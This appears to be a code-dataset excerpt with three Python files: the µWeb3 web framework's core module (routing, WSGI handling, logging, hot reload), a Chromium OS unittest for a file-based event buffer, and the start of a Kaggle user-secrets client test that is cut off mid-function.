source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
__init__.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""µWeb3 Framework"""
__version__ = '3.0'
# Standard modules
import configparser
import logging
import os
import re
import sys
from wsgiref.simple_server import make_server
import datetime
# Package modules
from . import pagemaker, request
# Package classes
from .response import Response, Redirect
from .pagemaker import PageMaker, decorators, WebsocketPageMaker, DebuggingPageMaker, LoginMixin
from .model import SettingsManager
from .libs.safestring import HTMLsafestring, JSONsafestring, JsonEncoder, Basesafestring
from importlib import reload
class Error(Exception):
"""Superclass used for inheritance and external exception handling."""
class ImmediateResponse(Exception):
"""Used to trigger an immediate response, foregoing the regular returns."""
class HTTPException(Error):
"""SuperClass for HTTP exceptions."""
class HTTPRequestException(HTTPException):
"""Exception for http request errors."""
class NoRouteError(Error):
"""The server does not know how to route this request"""
class Registry:
"""Something to hook stuff to"""
class Router:
def __init__(self, page_class):
self.pagemakers = page_class.LoadModules()
self.pagemakers.append(page_class)
def router(self, routes):
"""Returns the first request handler that matches the request URL.
The `routes` argument is an iterable of 2-tuples, each of which contain a
pattern (regex) and the name of the handler to use for matching requests.
Before returning the closure, all regexp are compiled, and handler methods
are retrieved from the provided `page_class`.
Arguments:
@ routes: iterable of 2-tuples.
Each tuple is a pair of `pattern` and `handler`, both are strings.
Returns:
request_router: Configured closure that processes urls.
"""
req_routes = []
# Variable used to store websocket pagemakers,
# these pagemakers are only created at startup but can have multiple routes.
# To prevent creating the same instance for each route we store them in a dict
websocket_pagemaker = {}
for pattern, *details in routes:
page_maker = None
for pm in self.pagemakers:
# Check if the page_maker has the method/handler we are looking for
if hasattr(pm, details[0]):
page_maker = pm
break
if callable(pattern):
# Check if the page_maker is already in the dict, if not instantiate
# if so just use that one. This prevents creating multiple instances for one route.
if not websocket_pagemaker.get(page_maker.__name__):
websocket_pagemaker[page_maker.__name__] = page_maker()
pattern(getattr(websocket_pagemaker[page_maker.__name__], details[0]))
continue
if not page_maker:
raise NoRouteError(f"µWeb3 could not find a route handler called '{details[0]}' in any of the PageMakers, your application will not start.")
req_routes.append((re.compile(pattern + '$', re.UNICODE),
details[0], #handler,
details[1].upper() if len(details) > 1 else 'ALL', #request types
details[2].lower() if len(details) > 2 else '*', #host
page_maker #pagemaker class
))
def request_router(url, method, host):
"""Returns the appropriate handler and arguments for the given `url`.
The`url` is matched against the compiled patterns in the `req_routes`
provided by the outer scope. Upon finding a pattern that matches, the
match groups from the regex and the unbound handler method are returned.
N.B. The rules are such that the first matching route will be used. There
is no further concept of specificity. Routes should be written with this in
mind.
Arguments:
@ url: str
The URL requested by the client.
@ method: str
The http method requested by the client.
@ host: str
The http host header value requested by the client.
Raises:
NoRouteError: None of the patterns match the requested `url`.
Returns:
2-tuple: handler method (unbound), and tuple of pattern matches.
"""
for pattern, handler, routemethod, hostpattern, page_maker in req_routes:
if routemethod != 'ALL':
# clearly not the route we where looking for
if isinstance(routemethod, tuple) and method not in routemethod:
continue
if method != routemethod:
continue
hostmatch = None
if hostpattern != '*':
# see if we can match this host and extact any info from it.
hostmatch = re.compile(f"^{host}$").match(hostpattern)
if not hostmatch:
# clearly not the host we where looking for
continue
hostmatch = hostmatch.groups()
match = pattern.match(url)
if match:
# strip out optional groups, as they return '', which would override
# the handlers default argument values later on in the page_maker
groups = (group for group in match.groups() if group)
return handler, groups, hostmatch, page_maker
raise NoRouteError(url +' cannot be handled')
return request_router
class uWeb:
"""Returns a configured closure for handling page requests.
This closure is configured with a precomputed set of routes and handlers using
the Router function. After this, incoming requests are processed and delegated
to the correct PageMaker handler.
The url in the received `req` object is taken and matches against the
`router`` (refer to Router() for more documentation on this).
Takes:
@ page_class: PageMaker
Class that holds request handling methods as defined in the `routes`
@ router: request router
The result of the Router() function.
@ config: dict
Configuration for the PageMaker. Typically contains entries for database
connections, default search paths etc.
Returns:
RequestHandler: Configured closure that is ready to process requests.
"""
def __init__(self, page_class, routes, executing_path=None, config='config'):
self.executing_path = executing_path or os.path.dirname(__file__)
self.config = SettingsManager(filename=config, path=self.executing_path)
self.logger = self.setup_logger()
self.inital_pagemaker = page_class
self.registry = Registry()
self.registry.logger = logging.getLogger('root')
self.router = Router(page_class).router(routes)
self.setup_routing()
self.encoders = {
'text/html': lambda x: HTMLsafestring(x, unsafe=True),
'text/plain': str,
'application/json': lambda x: JSONsafestring(x, unsafe=True)}
def __call__(self, env, start_response):
"""WSGI request handler.
Accepts the WSGI `environment` dictionary and a function to start the
response and returns a response iterator.
"""
req = request.Request(env, self.registry)
req.env['REAL_REMOTE_ADDR'] = request.return_real_remote_addr(req.env)
response = None
method = '_NotFound'
args = None
rollback = False
try:
method, args, hostargs, page_maker = self.router(req.path,
req.env['REQUEST_METHOD'],
req.env['host'])
except NoRouteError:
# When we catch this error this means there is no method for the route in the currently selected pagemaker.
# If this happens we default to the initial pagemaker because we don't know what the target pagemaker should be.
# Then we set an internalservererror and move on
page_maker = self.inital_pagemaker
try:
# instantiate the pagemaker for this request
pagemaker_instance = page_maker(req,
config=self.config,
executing_path=self.executing_path)
# specifically call _PreRequest as promised in documentation
if hasattr(pagemaker_instance, '_PreRequest'):
pagemaker_instance = pagemaker_instance._PreRequest()
response = self.get_response(pagemaker_instance, method, args)
except Exception:
# something broke in our pagemaker_instance, lets fall back to the most basic pagemaker for error output
if hasattr(pagemaker_instance, '_ConnectionRollback'):
try:
pagemaker_instance._ConnectionRollback()
except:
pass
pagemaker_instance = PageMaker(req,
config=self.config,
executing_path=self.executing_path)
response = pagemaker_instance.InternalServerError(*sys.exc_info())
if method != 'Static':
if not isinstance(response, Response):
# print('Upgrade response to Response class: %s' % type(response))
req.response.text = response
response = req.response
if not isinstance(response.text, Basesafestring):
# make sure we always output Safe HTML if our content type is something we should encode
encoder = self.encoders.get(response.clean_content_type(), None)
if encoder:
response.text = encoder(response.text)
if hasattr(pagemaker_instance, '_PostRequest'):
pagemaker_instance._PostRequest()
# CSP might be unneeded for some static content,
# https://github.com/w3c/webappsec/issues/520
if hasattr(pagemaker_instance, '_CSPheaders'):
pagemaker_instance._CSPheaders()
# provide users with a _PostRequest method to overide too
if method != 'Static' and hasattr(pagemaker_instance, 'PostRequest'):
response = pagemaker_instance.PostRequest(response)
# we should at least send out something to make sure we are wsgi compliant.
if not response.text:
response.text = ''
self._logging(req, response)
start_response(response.status, response.headerlist)
try:
yield response.text.encode(response.charset)
except AttributeError:
yield response.text
def setup_logger(self):
logger = logging.getLogger('uweb3_logger')
logger.setLevel(logging.INFO)
fh = logging.FileHandler(os.path.join(self.executing_path, 'access_logging.log'))
fh.setLevel(logging.INFO)
logger.addHandler(fh)
return logger
def _logging(self, req, response):
"""Logs incoming requests to a logfile.
This is enabled by default, even if its missing in the config file.
"""
if (self.config.options.get('development', None)
and self.config.options['development'].get('access_logging',
True) == 'False'):
return
host = req.env['HTTP_HOST'].split(':')[0]
date = datetime.datetime.now().strftime('%d/%m/%Y %H:%M:%S')
method = req.method
path = req.path
status = response.httpcode
protocol = req.env.get('SERVER_PROTOCOL')
self.logger.info(f"""{host} - - [{date}] \"{method} {path} {status} {protocol}\"""")
def get_response(self, page_maker, method, args):
try:
if method != 'Static':
# We're specifically calling _PostInit here as promised in documentation.
# pylint: disable=W0212
page_maker._PostInit()
elif hasattr(page_maker, '_StaticPostInit'):
# We're specifically calling _StaticPostInit here as promised in documentation, seperate from the regular PostInit to keep things fast for static pages
page_maker._StaticPostInit()
# pylint: enable=W0212
return getattr(page_maker, method)(*args)
except pagemaker.ReloadModules as message:
reload_message = reload(sys.modules[self.inital_pagemaker.__module__])
return Response(content='%s\n%s' % (message, reload_message))
except ImmediateResponse as err:
return err[0]
except Exception:
if (self.config.options.get('development', False)
and self.config.options['development'].get('error_logging',
True) == 'True'):
logger = logging.getLogger('uweb3_exception_logger')
fh = logging.FileHandler(os.path.join(self.executing_path, 'uweb3_uncaught_exceptions.log'))
logger.addHandler(fh)
logger.exception("UNCAUGHT EXCEPTION:")
return page_maker.InternalServerError(*sys.exc_info())
def serve(self):
"""Sets up and starts WSGI development server for the current app."""
host = 'localhost'
port = 8001
hotreload = False
dev = False
interval = None
ignored_directories = ['__pycache__',
self.inital_pagemaker.PUBLIC_DIR,
self.inital_pagemaker.TEMPLATE_DIR]
if self.config.options.get('development', False):
host = self.config.options['development'].get('host', host)
port = self.config.options['development'].get('port', port)
hotreload = self.config.options['development'].get('reload', False) in ('True', 'true')
dev = self.config.options['development'].get('dev', False) in ('True', 'true')
interval = int(self.config.options['development'].get('checkinterval', 0))
ignored_extensions = self.config.options['development'].get('ignored_extensions', '').split(',')
ignored_directories += self.config.options['development'].get('ignored_directories', '').split(',')
server = make_server(host, int(port), self)
print(f'Running µWeb3 server on http://{server.server_address[0]}:{server.server_address[1]}')
print(f'Root dir is: {self.executing_path}')
try:
if hotreload:
print(f'Hot reload is enabled for changes in: {self.executing_path}')
HotReload(self.executing_path, interval=interval, dev=dev,
ignored_extensions=ignored_extensions,
ignored_directories=ignored_directories)
server.serve_forever()
except Exception as error:
print(error)
server.shutdown()
def setup_routing(self):
if isinstance(self.inital_pagemaker, list):
routes = [route for route in self.inital_pagemaker[1:]]
self.inital_pagemaker[0].AddRoutes(tuple(routes))
self.inital_pagemaker = self.inital_pagemaker[0]
default_route = "routes"
automatic_detection = True
if self.config.options.get('routing'):
default_route = self.config.options['routing'].get('default_routing', default_route)
automatic_detection = self.config.options['routing'].get('disable_automatic_route_detection', 'False') != 'True'
if automatic_detection:
self.inital_pagemaker.LoadModules(routes=default_route)
class HotReload:
"""This class handles the thread which scans for file changes in the
execution path and restarts the server if needed"""
IGNOREDEXTENSIONS = [".pyc", '.ini', '.md', '.html', '.log', '.sql']
def __init__(self, path, interval=None, dev=False, ignored_extensions=None, ignored_directories=None):
"""Takes a path, an optional interval in seconds and an optional flag
signaling a development environment which will set the path for new and
changed file checking on the parent folder of the serving file."""
import threading
self.running = threading.Event()
self.interval = interval or 1
self.path = os.path.dirname(path)
self.ignoredextensions = self.IGNOREDEXTENSIONS + (ignored_extensions or [])
self.ignoreddirectories = ignored_directories
if dev:
from pathlib import Path
self.path = str(Path(self.path).parents[1])
self.thread = threading.Thread(target=self.Run)
self.thread.daemon = True
self.thread.start()
def Run(self):
""" Method runs forever and watches all files in the project folder."""
self.watched_files = self.Files()
self.mtimes = [(f, os.path.getmtime(f)) for f in self.watched_files]
import time
while True:
time.sleep(self.interval)
new = self.Files(self.watched_files)
if new:
print('{color}New file added or deleted\x1b[0m \nRestarting µWeb3'.format(color='\x1b[7;30;41m'))
self.Restart()
for f, mtime in self.mtimes:
if os.path.getmtime(f) != mtime:
print('{color}Detected changes in {file}\x1b[0m \nRestarting µWeb3'.format(color='\x1b[7;30;41m', file=f))
self.Restart()
def Files(self, current=None):
"""Returns all files inside the working directory of uweb3."""
if not current:
current = set()
new = set()
for dirpath, dirnames, filenames in os.walk(self.path):
if any(list(map(lambda dirname: dirname in dirpath, self.ignoreddirectories))):
continue
for file in filenames:
fullname = os.path.join(dirpath, file)
if fullname in current or fullname.endswith('~'):
continue
ext = os.path.splitext(file)[1]
if ext not in self.ignoredextensions:
new.add(fullname)
return new
def Restart(self):
"""Restart uweb3 with all provided system arguments."""
self.running.clear()
os.execl(sys.executable, sys.executable, * sys.argv)
|
buffer_simple_file_unittest.py | #!/usr/bin/env python3
#
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for simple file-based buffer."""
# TODO(kitching): Add tests that deal with "out of disk space" situations.
# TODO(kitching): Add tests for reading data from corrupted databases.
# - data.json is smaller than pos in metadata.json
# - metadata.json does not contain the right version
# - metadata.json is an empty dict {}
# - metadata.json does not exist
# - data.json does not exist
# - metadata recovery: uncorrupted data.json
# - metadata recovery: corruptions at the beginning of data.json
# - metadata recovery: corruptions at the end of data.json
# - metadata recovery: fully corrupted data.json
# - consumer metadata: seq smaller than first_seq
# - consumer metadata: seq larger than last_seq
# - consumer metadata: pos smaller than start_pos
# - consumer metadata: pos larger than end_pos
# - consumer metadata: pos not synchronized with seq
# - consumer metadata is an empty dict {}
# - consumer metadata missing cur_pos or cur_seq
# TODO(kitching): Add tests for failure during Truncate operation.
import collections
import functools
import logging
import os
import queue
import random
import shutil
import tempfile
import threading
import time
import unittest
from cros.factory.instalog import datatypes
from cros.factory.instalog import log_utils
from cros.factory.instalog import plugin_base
# pylint: disable=no-name-in-module
from cros.factory.instalog.plugins import buffer_file_common
from cros.factory.instalog.plugins import buffer_simple_file
from cros.factory.instalog.utils import file_utils
# pylint: disable=protected-access
def _WithBufferSize(buffer_size):
def ModifyFn(fn):
@functools.wraps(fn)
def Wrapper(*args, **kwargs):
old_buffer_size_bytes = (
buffer_simple_file.buffer_file_common._BUFFER_SIZE_BYTES)
buffer_simple_file.buffer_file_common._BUFFER_SIZE_BYTES = buffer_size
try:
fn(*args, **kwargs)
finally:
buffer_simple_file.buffer_file_common._BUFFER_SIZE_BYTES = (
old_buffer_size_bytes)
return Wrapper
return ModifyFn
class TestBufferSimpleFile(unittest.TestCase):
def _CreateBuffer(self, config=None):
# Remove previous temporary folder if any.
if self.data_dir is not None:
shutil.rmtree(self.data_dir)
self.data_dir = tempfile.mkdtemp(prefix='buffer_simple_file_unittest_')
logging.info('Create state directory: %s', self.data_dir)
self.sf = buffer_simple_file.BufferSimpleFile(
config={} if config is None else config,
logger_name=self.logger.name,
store={},
plugin_api=None)
self.sf.GetDataDir = lambda: self.data_dir
self.sf.SetUp()
self.e1 = datatypes.Event({'test1': 'event'})
self.e2 = datatypes.Event({'test22': 'event'})
self.e3 = datatypes.Event({'test333': 'event'})
self.e4 = datatypes.Event({'test4444': 'event'})
self.e5 = datatypes.Event({'test55555': 'event'})
def setUp(self):
self.logger = logging.getLogger('simple_file')
self.data_dir = None
self._CreateBuffer()
def tearDown(self):
shutil.rmtree(self.data_dir)
def testFormatParseRecord(self):
"""Tests internal format and parse of data.json record."""
SEQ = 1989
RECORD = '{1: "hello world"}'
FORMATED_RECORD = '[1989, {1: "hello world"}, "ea05f160"]\n'
self.assertEqual(FORMATED_RECORD,
buffer_file_common.FormatRecord(SEQ, RECORD))
seq, record = buffer_file_common.ParseRecord(
FORMATED_RECORD, self.logger.name)
self.assertEqual(SEQ, seq)
self.assertEqual(RECORD, record)
# TODO(chuntsen): Remove old format.
seq, record = buffer_file_common.ParseRecord(
'[1989, {1: "hello world"}, 15fa0ea0]\n', self.logger.name)
self.assertEqual(SEQ, seq)
self.assertEqual(RECORD, record)
# TODO(chuntsen): Remove legacy test.
seq, record = buffer_file_common.ParseRecord(
'[1989, {1: "hello world"}, "15fa0ea0"]\n', self.logger.name)
self.assertEqual(SEQ, seq)
self.assertEqual(RECORD, record)
def testAddRemoveConsumer(self):
"""Tests adding and removing a Consumer."""
self.assertEqual({}, self.sf.ListConsumers())
self.sf.AddConsumer('a')
self.assertEqual(['a'], list(self.sf.ListConsumers()))
self.sf.RemoveConsumer('a')
self.assertEqual({}, self.sf.ListConsumers())
def testWriteRead(self):
"""Tests writing and reading back an Event."""
self.sf.Produce([self.e1])
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
self.assertEqual(self.e1, stream.Next())
def testLongCorruptedRecord(self):
"""Tests reading from a data store with a long corrupted record."""
# Ensure that the size of the event is greater than _BUFFER_SIZE_BYTES.
# pylint: disable=protected-access
e = datatypes.Event(
{'data':
'x' * buffer_simple_file.buffer_file_common._BUFFER_SIZE_BYTES})
self.sf.Produce([e])
# Purposely corrupt the data file.
with open(self.sf.buffer_file.data_path, 'r+') as f:
f.seek(1)
f.write('x')
self.sf.Produce([self.e2])
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
self.assertEqual(self.e2, stream.Next())
def testSkippedRecords(self):
"""Tests recovery from skipped records due to corruption.
Previously (prior to this test), a bug existed where, after a corrupt record
was skipped, its length was not included in calculating "new_pos" for a
consumer when processing subsequent records.
To illustrate this bug, we design a situation where we have two "buffer
refills". The first one includes a garbage event (e2) which will be
dropped. Padding is inserted into event e to ensure that the last event e3
is pushed into buffer refill #2. Events are retrieved sequentially from
buffer refill #1. As long as len(e2) > len(e1), after retrieving the last
event from buffer refill #1, the consumer's new_pos will be set to a
location *before* the last event in buffer refill #1. Thus the next buffer
will include both e1 and e3.
|--------------refill buffer #1----------------||---refill buffer #2---|
[ e1 ] [ e2 GARBAGE ] [ e ] [ e1 ] [ e3 ]
To calculate buffer size needed in e:
-------- (doesn't count) ------- -------- +1 to push over "<" limit
The fix is to ensure that the length of any previous "garbage records" are
included in the stored "length" of any event in the buffer. E.g. in this
case, the length of e2(GARBAGE) would be included in the length of event e.
"""
self.sf.Produce([self.e1])
e1_end = os.path.getsize(self.sf.buffer_file.data_path)
self.sf.Produce([self.e2])
e2_end = os.path.getsize(self.sf.buffer_file.data_path)
# Corrupt event e2 by writing garbage at the end.
with open(self.sf.buffer_file.data_path, 'r+') as f:
f.seek(e2_end - 10)
f.write('x' * 5)
# pylint: disable=protected-access
# Ensure that both e and e1 are included in the first buffer refill. The
# length of e can be based off of that of e1 (same base payload).
bytes_left = (buffer_simple_file.buffer_file_common._BUFFER_SIZE_BYTES -
(e1_end * 3) + 1)
e = datatypes.Event({'test1': 'event' + ('x' * bytes_left)})
self.sf.Produce([e])
self.sf.Produce([self.e1])
self.sf.Produce([self.e3])
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
self.assertEqual(self.e1, stream.Next())
self.assertEqual(e, stream.Next())
self.assertEqual(self.e1, stream.Next())
self.assertEqual(self.e3, stream.Next())
def testAppendedJunkStore(self):
"""Tests reading from a data store that has appended junk."""
self.sf.Produce([self.e1])
# Purposely append junk to the data store
with open(self.sf.buffer_file.data_path, 'a') as f:
f.write('xxxxxxxx')
self.sf.Produce([self.e2])
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
self.assertEqual(self.e1, stream.Next())
self.assertEqual(self.e2, stream.Next())
def testTwoBufferEventStreams(self):
"""Tries creating two BufferEventStream objects for one Consumer."""
self.sf.AddConsumer('a')
stream1 = self.sf.Consume('a')
stream2 = self.sf.Consume('a')
self.assertIsInstance(stream1, plugin_base.BufferEventStream)
self.assertEqual(stream2, None)
def testUseExpiredBufferEventStream(self):
"""Tests continuing to use an expired BufferEventStream."""
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
stream.Commit()
with self.assertRaises(plugin_base.EventStreamExpired):
stream.Next()
with self.assertRaises(plugin_base.EventStreamExpired):
stream.Abort()
with self.assertRaises(plugin_base.EventStreamExpired):
stream.Commit()
def testFirstLastSeq(self):
"""Checks the proper tracking of first_seq and last_seq."""
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 0)
first_seq, _ = self.sf.buffer_file._GetFirstUnconsumedRecord()
self.assertEqual(first_seq, 1)
self.sf.buffer_file.Truncate()
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 0)
first_seq, _ = self.sf.buffer_file._GetFirstUnconsumedRecord()
self.assertEqual(first_seq, 1)
self.sf.Produce([self.e1])
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 1)
first_seq, _ = self.sf.buffer_file._GetFirstUnconsumedRecord()
self.assertEqual(first_seq, 2)
self.sf.Produce([self.e1])
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 2)
first_seq, _ = self.sf.buffer_file._GetFirstUnconsumedRecord()
self.assertEqual(first_seq, 3)
def testTruncate(self):
"""Checks that Truncate truncates up to the last unread event."""
self.sf.AddConsumer('a')
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 0)
self.sf.Produce([self.e1, self.e2])
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 2)
self.sf.buffer_file.Truncate()
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 2)
stream = self.sf.Consume('a')
self.assertEqual(self.e1, stream.Next())
stream.Commit()
self.sf.buffer_file.Truncate()
self.assertEqual(self.sf.buffer_file.first_seq, 2)
self.assertEqual(self.sf.buffer_file.last_seq, 2)
def testSeqOrder(self):
"""Checks that the order of sequence keys is consistent."""
self.sf.AddConsumer('a')
self.sf.buffer_file.Truncate()
self.sf.Produce([self.e1])
stream = self.sf.Consume('a')
seq, _ = stream._Next()
self.assertEqual(seq, 1)
stream.Commit()
self.sf.buffer_file.Truncate()
self.sf.Produce([self.e1, self.e1])
stream = self.sf.Consume('a')
seq, _ = stream._Next()
self.assertEqual(seq, 2)
seq, _ = stream._Next()
self.assertEqual(seq, 3)
stream.Commit()
@_WithBufferSize(0) # Force only keeping one record in buffer.
def testReloadBufferAfterTruncate(self):
"""Tests re-loading buffer of a BufferEventStream after Truncate."""
self.sf.AddConsumer('a')
self.sf.Produce([self.e1, self.e2, self.e3])
stream1 = self.sf.Consume('a')
self.assertEqual(self.e1, stream1.Next())
stream1.Commit()
stream2 = self.sf.Consume('a')
# Explicitly check that stream2's buffer only contains one item. This
# means the buffer will need to be reloaded after the following sequence
# of Next and Truncate.
self.assertEqual(1, len(stream2._Buffer()))
self.assertEqual(self.e2, stream2.Next())
self.sf.buffer_file.Truncate()
self.assertEqual(self.e3, stream2.Next())
stream2.Commit()
def testRecreateConsumer(self):
"""Tests for same position after removing and recreating Consumer."""
self.sf.Produce([self.e1, self.e2, self.e3])
self.sf.AddConsumer('a')
stream1 = self.sf.Consume('a')
self.assertEqual(self.e1, stream1.Next())
stream1.Commit()
self.sf.RemoveConsumer('a')
self.sf.AddConsumer('a')
stream2 = self.sf.Consume('a')
self.assertEqual(self.e2, stream2.Next())
stream2.Commit()
def testRecreateConsumerAfterTruncate(self):
"""Tests that recreated Consumer updates position after truncate."""
self.sf.Produce([self.e1, self.e2, self.e3])
self.sf.AddConsumer('a')
stream1 = self.sf.Consume('a')
self.assertEqual(self.e1, stream1.Next())
stream1.Commit()
self.sf.RemoveConsumer('a')
self.sf.AddConsumer('b')
stream2 = self.sf.Consume('b')
self.assertEqual(self.e1, stream2.Next())
self.assertEqual(self.e2, stream2.Next())
stream2.Commit()
self.sf.buffer_file.Truncate()
# Verify that the metadata is consistent after running Truncate.
self.sf.SetUp()
self.sf.AddConsumer('a')
stream3 = self.sf.Consume('a')
# Skips self.e2, since Truncate occurred while Consumer 'a' did not exist.
self.assertEqual(self.e3, stream3.Next())
stream3.Commit()
def testMultiThreadProduce(self):
"""Tests for correct output with multiple threads Producing events."""
random.seed(0)
def ProducerThread():
# Random sleep so that each thread produce isn't in sync.
time.sleep(random.randrange(3) * 0.1)
for unused_i in range(10):
self.sf.Produce([self.e1, self.e2, self.e3])
threads = []
for unused_i in range(10):
t = threading.Thread(target=ProducerThread)
threads.append(t)
t.start()
for t in threads:
t.join()
# 10 threads, 10 * 3 events each = expected 300 events, 100 of each type.
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
cur_seq = 1
record_count = collections.defaultdict(int)
while True:
seq, record = stream._Next()
if not seq:
break
# Make sure the sequence numbers are correct.
self.assertEqual(cur_seq, seq)
cur_seq += 1
record_count[record] += 1
self.assertEqual(3, len(record_count))
self.assertTrue(all([x == 100 for x in record_count.values()]))
@_WithBufferSize(80) # Each line is around ~35 characters.
def testMultiThreadConsumeTruncate(self):
"""Tests multiple Consumers reading simultaneously when Truncate occurs."""
record_count_queue = queue.Queue()
def ConsumerThread(consumer_id):
stream = self.sf.Consume(consumer_id)
record_count = collections.defaultdict(int)
count = 0
while True:
# Commit and start a new BufferEventStream every 10 events.
if count % 10 == 0:
logging.info('Committing after 10 events...')
stream.Commit()
stream = self.sf.Consume(consumer_id)
event = stream.Next()
if not event:
break
record_count[repr(event.payload)] += 1
count += 1
stream.Commit()
record_count_queue.put(record_count)
self.sf.Produce([self.e1, self.e2, self.e3] * 25)
for i in range(2):
self.sf.AddConsumer(str(i))
threads = []
for i in range(2):
t = threading.Thread(target=ConsumerThread, args=(str(i),))
threads.append(t)
t.start()
for t in threads:
while t.isAlive():
# Add a small sleep to prevent occupying read_lock
time.sleep(0.01)
self.sf.buffer_file.Truncate()
t.join()
self.sf.buffer_file.Truncate()
self.assertEqual(25 * 3 + 1, self.sf.buffer_file.first_seq)
while not record_count_queue.empty():
record_count = record_count_queue.get()
self.assertEqual(3, len(record_count))
self.assertTrue(all([x == 25 for x in record_count.values()]))
def _CountAttachmentsInBuffer(self, sf):
return len(os.listdir(sf.buffer_file.attachments_dir))
def _TestAttachment(self, with_copy):
"""Helper function to test basic attachment functionality."""
FILE_STRING = 'Hello World!'
self._CreateBuffer({'copy_attachments': with_copy})
with file_utils.UnopenedTemporaryFile() as path:
with open(path, 'w') as f:
f.write(FILE_STRING)
self.assertTrue(os.path.isfile(path))
event = datatypes.Event({}, {'a': path})
self.assertEqual(True, self.sf.Produce([event]))
self.assertTrue(os.path.isfile(path) == with_copy)
# Get the event out of buffer to verify that the internal
# attachment exists.
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
internal_event = stream.Next()
internal_path = internal_event.attachments['a']
self.assertEqual(FILE_STRING, file_utils.ReadFile(internal_path))
# Ensure that an absolute path is returned.
self.assertTrue(internal_path.startswith('/'))
self.assertEqual(1, self._CountAttachmentsInBuffer(self.sf))
def testCopyAttachment(self):
"""Tests that an attachment is properly copied into the buffer state."""
self._TestAttachment(True)
def testMoveAttachment(self):
"""Tests that an attachment is properly moved into the buffer state."""
self._TestAttachment(False)
def testNonExistentAttachment(self):
"""Tests behaviour when a non-existent attachment is provided."""
event = datatypes.Event({}, {'a': '/tmp/non_existent_file'})
self.assertEqual(False, self.sf.Produce([event]))
self.assertEqual(0, self._CountAttachmentsInBuffer(self.sf))
def testPartFailMoveAttachmentTwoEvents(self):
"""Tests moving two attachments in separate events (real and fake)."""
self._CreateBuffer({'copy_attachments': False})
with file_utils.UnopenedTemporaryFile() as path:
real_event = datatypes.Event({}, {'a': path})
fake_event = datatypes.Event({}, {'a': '/tmp/non_existent_file'})
self.assertEqual(False, self.sf.Produce([real_event, fake_event]))
# Make sure source file still exists since Produce failed.
self.assertTrue(os.path.isfile(path))
# Make sure attachments_dir is empty.
self.assertEqual(0, self._CountAttachmentsInBuffer(self.sf))
def testPartFailMoveAttachmentOneEvent(self):
"""Tests moving two attachments in a single event (real and fake)."""
self._CreateBuffer({'copy_attachments': False})
with file_utils.UnopenedTemporaryFile() as path:
event = datatypes.Event({}, {
'a': path,
'b': '/tmp/non_existent_file'})
self.assertEqual(False, self.sf.Produce([event]))
# Make sure source file still exists since Produce failed.
self.assertTrue(os.path.isfile(path))
# Make sure attachments_dir is empty.
self.assertEqual(0, self._CountAttachmentsInBuffer(self.sf))
def testTruncateAttachments(self):
"""Tests that truncate removes attachments of truncated events."""
FILE_STRING = 'Hello World!'
with file_utils.UnopenedTemporaryFile() as path:
with open(path, 'w') as f:
f.write(FILE_STRING)
event = datatypes.Event({}, {'a': path})
self.sf.Produce([event])
self.assertEqual(1, self._CountAttachmentsInBuffer(self.sf))
self.sf.buffer_file.Truncate(truncate_attachments=False)
self.assertEqual(1, self._CountAttachmentsInBuffer(self.sf))
self.sf.buffer_file.Truncate()
self.assertEqual(0, self._CountAttachmentsInBuffer(self.sf))
if __name__ == '__main__':
log_utils.InitLogging(log_utils.GetStreamHandler(logging.INFO))
unittest.main()
|
test_user_secrets.py | import json
import os
import threading
import unittest
from http.server import BaseHTTPRequestHandler, HTTPServer
from test.support import EnvironmentVarGuard
from urllib.parse import urlparse
from google.auth.exceptions import DefaultCredentialsError
from google.cloud import bigquery
from kaggle_secrets import (_KAGGLE_URL_BASE_ENV_VAR_NAME,
_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME,
CredentialError, UserSecretsClient, BackendError)
_TEST_JWT = 'test-secrets-key'
class UserSecretsHTTPHandler(BaseHTTPRequestHandler):
def set_request(self):
raise NotImplementedError()
def get_response(self):
raise NotImplementedError()
def do_HEAD(s):
s.send_response(200)
def do_POST(s):
s.set_request()
s.send_response(200)
s.send_header("Content-type", "application/json")
s.end_headers()
s.wfile.write(json.dumps(s.get_response()).encode("utf-8"))
class TestUserSecrets(unittest.TestCase):
SERVER_ADDRESS = urlparse(os.getenv(_KAGGLE_URL_BASE_ENV_VAR_NAME))
def _test_client(self, client_func, expected_path, expected_body, secret=None, success=True):
_request = {}
class AccessTokenHandler(UserSecretsHTTPHandler):
def set_request(self):
_request['path'] = self.path
content_len = int(self.headers.get('Content-Length'))
_request['body'] = json.loads(self.rfile.read(content_len))
_request['headers'] = self.headers
def get_response(self):
if success:
return {'result': {'secret': secret, 'secretType': 'refreshToken', 'secretProvider': 'google'}, 'wasSuccessful': "true"}
else:
return {'wasSuccessful': "false"}
env = EnvironmentVarGuard()
env.set(_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME, _TEST_JWT)
with env:
with HTTPServer((self.SERVER_ADDRESS.hostname, self.SERVER_ADDRESS.port), AccessTokenHandler) as httpd:
threading.Thread(target=httpd.serve_forever).start()
try:
client_func()
finally:
httpd.shutdown()
path, headers, body = _request['path'], _request['headers'], _request['body']
self.assertEqual(
path,
expected_path,
msg="Fake server did not receive the right request from the UserSecrets client.")
self.assertEqual(
body,
expected_body,
msg="Fake server did not receive the right body from the UserSecrets client.")
def test_no_token_fails(self):
env = EnvironmentVarGuard()
env.unset(_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME)
with env:
with self.assertRaises(CredentialError):
